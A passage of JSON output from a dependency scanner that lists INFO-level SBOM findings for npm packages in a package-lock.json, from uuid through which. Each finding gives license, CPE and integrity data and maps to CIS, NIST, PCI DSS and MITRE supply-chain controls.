"SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: uuid 9.0.1", "title": "uuid 9.0.1", "description": "Package discovered: uuid 9.0.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "0bd59342bab05265", "name": "uuid", "version": "9.0.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:uuid:uuid:9.0.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/uuid@9.0.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/uuid/-/uuid-9.0.1.tgz", "integrity": "sha512-b+1eJOlsR9K8HJpow9Ok3fiWOWSIcIzXodvv0rQjVoOVNpWMpxf1wZNpt4y9h10odCNrqnYp1OBzRktckBe3sA==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "4e3576c544465abd", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: vary 1.1.2", "title": "vary 1.1.2", "description": "Package discovered: vary 1.1.2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "2fc27b955ce3ef5d", "name": "vary", "version": "1.1.2", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:vary:vary:1.1.2:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/vary@1.1.2", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/vary/-/vary-1.1.2.tgz", "integrity": "sha512-BNGbWLfd0eUPabhkXUVm0j8uuvREyTh5ovRa/dyow/BqAbZJyC+5fU+IzQOzmAKzYqYRAISoRhdQr3eIZ/PXqg==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "60e43c65d8e9a8e6", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: victory-vendor 36.9.2", "title": "victory-vendor 36.9.2", "description": "Package discovered: victory-vendor 36.9.2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "14c55cee8eb4e77f", "name": "victory-vendor", "version": "36.9.2", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT AND ISC", "spdxExpression": "MIT AND ISC", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:victory-vendor:victory-vendor:36.9.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:victory-vendor:victory_vendor:36.9.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:victory_vendor:victory-vendor:36.9.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:victory_vendor:victory_vendor:36.9.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:victory:victory-vendor:36.9.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:victory:victory_vendor:36.9.2:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/victory-vendor@36.9.2", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/victory-vendor/-/victory-vendor-36.9.2.tgz", "integrity": "sha512-PnpQQMuxlwYdocC8fIJqVXvkeViHYzotI+NJrCuav0ZYFoq912ZHBk3mCeuj+5/VpodOjPe1z0Fk2ihgzlXqjQ==", "dependencies": { "@types/d3-array": "^3.0.3", "@types/d3-ease": "^3.0.0", "@types/d3-interpolate": "^3.0.1", "@types/d3-scale": "^4.0.2", "@types/d3-shape": "^3.1.0", "@types/d3-time": "^3.0.0", "@types/d3-timer": "^3.0.0", "d3-array": "^3.1.6", "d3-ease": "^3.0.1", "d3-interpolate": "^3.0.1", "d3-scale": "^4.0.2", "d3-shape": "^3.1.0", "d3-time": "^3.0.0", "d3-timer": "^3.0.1" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "a846a040ec49fd72", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: vite-compatible-readable-stream 3.6.1", "title": "vite-compatible-readable-stream 3.6.1", "description": "Package discovered: vite-compatible-readable-stream 3.6.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "874d0721c00b1770", "name": "vite-compatible-readable-stream", "version": "3.6.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:vite-compatible-readable-stream:vite-compatible-readable-stream:3.6.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:vite-compatible-readable-stream:vite_compatible_readable_stream:3.6.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:vite_compatible_readable_stream:vite-compatible-readable-stream:3.6.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:vite_compatible_readable_stream:vite_compatible_readable_stream:3.6.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:vite-compatible-readable:vite-compatible-readable-stream:3.6.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:vite-compatible-readable:vite_compatible_readable_stream:3.6.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:vite_compatible_readable:vite-compatible-readable-stream:3.6.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:vite_compatible_readable:vite_compatible_readable_stream:3.6.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:vite-compatible:vite-compatible-readable-stream:3.6.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:vite-compatible:vite_compatible_readable_stream:3.6.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:vite_compatible:vite-compatible-readable-stream:3.6.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:vite_compatible:vite_compatible_readable_stream:3.6.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:vite:vite-compatible-readable-stream:3.6.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:vite:vite_compatible_readable_stream:3.6.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/vite-compatible-readable-stream@3.6.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/vite-compatible-readable-stream/-/vite-compatible-readable-stream-3.6.1.tgz", "integrity": "sha512-t20zYkrSf868+j/p31cRIGN28Phrjm3nRSLR2fyc2tiWi4cZGVdv68yNlwnIINTkMTmPoMiSlc0OadaO7DXZaQ==", "dependencies": { "inherits": "^2.0.3", "string_decoder": "^1.1.1", "util-deprecate": "^1.0.1" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "c6d0b110f80cc969", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: webidl-conversions 3.0.1", "title": "webidl-conversions 3.0.1", "description": "Package discovered: webidl-conversions 3.0.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "770e2f7ad3b1c524", "name": "webidl-conversions", "version": "3.0.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "BSD-2-Clause", "spdxExpression": "BSD-2-Clause", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:webidl-conversions:webidl-conversions:3.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:webidl-conversions:webidl_conversions:3.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:webidl_conversions:webidl-conversions:3.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:webidl_conversions:webidl_conversions:3.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:webidl:webidl-conversions:3.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:webidl:webidl_conversions:3.0.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/webidl-conversions@3.0.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/webidl-conversions/-/webidl-conversions-3.0.1.tgz", "integrity": "sha512-2JAn3z8AR6rjK8Sm8orRC0h/bcl/DqL7tRPdGZ4I1CjdF+EaMLmYxBHyXuKL849eucPFhvBoxMsflfOb8kxaeQ==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "c76cb0d14c517e35", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: websocket-driver 0.7.4", "title": "websocket-driver 0.7.4", "description": "Package discovered: websocket-driver 0.7.4", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "944bd0667b1458ca", "name": "websocket-driver", "version": "0.7.4", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "Apache-2.0", "spdxExpression": "Apache-2.0", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:websocket-driver:websocket-driver:0.7.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:websocket-driver:websocket_driver:0.7.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:websocket_driver:websocket-driver:0.7.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:websocket_driver:websocket_driver:0.7.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:websocket:websocket-driver:0.7.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:websocket:websocket_driver:0.7.4:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/websocket-driver@0.7.4", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/websocket-driver/-/websocket-driver-0.7.4.tgz", "integrity": "sha512-b17KeDIQVjvb0ssuSDF2cYXSg2iztliJ4B9WdsuB6J952qCPKmnVq4DyW5motImXHDC1cBT/1UezrJVsKw5zjg==", "dependencies": { "http-parser-js": ">=0.5.1", "safe-buffer": ">=5.1.0", "websocket-extensions": ">=0.1.1" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "bb5b0fea2c384fe7", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: websocket-extensions 0.1.4", "title": "websocket-extensions 0.1.4", "description": "Package discovered: websocket-extensions 0.1.4", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "6844e064384011a8", "name": "websocket-extensions", "version": "0.1.4", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "Apache-2.0", "spdxExpression": "Apache-2.0", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:websocket-extensions_project:websocket-extensions:0.1.4:*:*:*:*:node.js:*:*", "source": "nvd-cpe-dictionary" } ], "purl": "pkg:npm/websocket-extensions@0.1.4", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/websocket-extensions/-/websocket-extensions-0.1.4.tgz", "integrity": "sha512-OqedPIGOfsDlo31UNwYbCFMSaO9m9G/0faIHj5/dZFDMFqPTcx6UwqyOy3COEaEOg/9VsGIpdqn62W5KhoKSpg==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "c0ee8f2bbf5fd4e3", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: whatwg-url 5.0.0", "title": "whatwg-url 5.0.0", "description": "Package discovered: whatwg-url 5.0.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "0827d54a7a5ea1e5", "name": "whatwg-url", "version": "5.0.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:whatwg-url:whatwg-url:5.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:whatwg-url:whatwg_url:5.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:whatwg_url:whatwg-url:5.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:whatwg_url:whatwg_url:5.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:whatwg:whatwg-url:5.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:whatwg:whatwg_url:5.0.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/whatwg-url@5.0.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/whatwg-url/-/whatwg-url-5.0.0.tgz", "integrity": "sha512-saE57nupxk6v3HY35+jzBwYa0rKSy0XR8JSxZPwgLr7ys0IBzhGviA1/TUGJLmSVqs8pb9AnvICXEuOHLprYTw==", "dependencies": { "tr46": "~0.0.3", "webidl-conversions": "^3.0.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "10cad46c067a700f", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: which 2.0.2", "title": "which 2.0.2", "description": "Package discovered: which 2.0.2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "414763db2a64d1aa", "name": "which", "version": "2.0.2", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "ISC", "spdxExpression": "ISC", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:which:which:2.0.2:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/which@2.0.2", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/which/-/which-2.0.2.tgz", "integrity": "sha512-BLI3Tl1TW3Pvl70l3yq3Y64i+awpwXqsGBYWkkqMtnbXgrMD+yj7rhW0kuEDxzJaYXGjEW5ogapKNMEKNMjibA==", "dependencies": { "isexe": "^2.0.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": 